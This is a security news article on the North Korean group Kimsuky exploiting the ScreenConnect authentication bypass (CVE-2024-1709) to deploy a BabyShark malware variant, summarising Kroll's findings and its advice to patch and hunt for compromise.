Threat actors have been exploiting a previously disclosed flaw in ScreenConnect in order to deploy a variant of known malware that has been associated with the Kimsuky North Korean threat group.
The ScreenConnect authentication bypass flaw (CVE-2024-1709) affects all versions below 23.9.8 and since its disclosure last Monday researchers have reported a number of exploitation attempts. Kimsuky, a group that has previously targeted think tanks, academic institutions and news media organizations, is the most recent threat actor to target the flaw, and researchers with Kroll that uncovered this recent campaign - which they were able to detect and stop - warned users of ConnectWise’s software to patch immediately.
“The list of threat actors utilizing the ScreenConnect vulnerability CVE-2024-1709 for initial access is growing,” said Keith Wojcieszek, George Glass and Dave Truman, with Kroll, in a Tuesday analysis. “The malware being deployed in this case uses execution through a legitimate Microsoft binary, MSHTA, and exhibits elements of polymorphic behavior in the form of changing identity strings in code, changing the position of code via generated junk code and using uniquely generate C2 URLs, which could make this malware hard to detect in some environments.”
The threat actors gained access to a targeted workstation by exploiting the exposed setup wizard of the ScreenConnect application, said researchers. As part of its post-compromise activity, the group deployed new malware via an initial payload downloaded by the Windows-native MSHTA binary, which is designed to execute Microsoft HTML Application files.
“The function names, variables names, junk code and hexadecimal change each time the initial payload is downloaded, meaning the hash of the file being downloaded will never be the same twice,” said researchers. “The addition of a random number of lines of junk code containing randomized strings will also obfuscate the meaningful code within the malware.”
Researchers said that the code and behavior of the malware resembles the VBScript-based BabyShark malware, which was uncovered in 2018 in spear-phishing campaigns associated with North Korean threat actors. This malware has been known for exfiltrating system information to the C2 server and maintaining persistence. In this campaign, the variant of BabyShark exfiltrates data related to host, user, network and security software information, as well as installed software and running processes. The malware also sets up a scheduled task requesting a URL every minute - however, “during Kroll’s testing, the data returning from the URL in the scheduled task was not observed.”
“Kroll assessed with medium confidence that this occurred because the URL may only return code if the information gathered and sent back indicates a compromised host that meets the threat actors’ criteria,” said researchers. “If this were the case, the scheduled task would act as a rudimentary loader for a further stage of malware with the unique base64 string within the URL acting as unique host identifier of sorts.”
As threat actors continue to target the ScreenConnect flaw in campaigns like this one, Kroll researchers urged companies running ConnectWise ScreenConnect versions 23.9.7 and prior to “assume compromise” and patch immediately. Additionally, “consider an independent threat hunt/compromise assessment be completed on your systems to ensure that suspicious activity or malware was not inserted prior to patching or remediation,” according to researchers.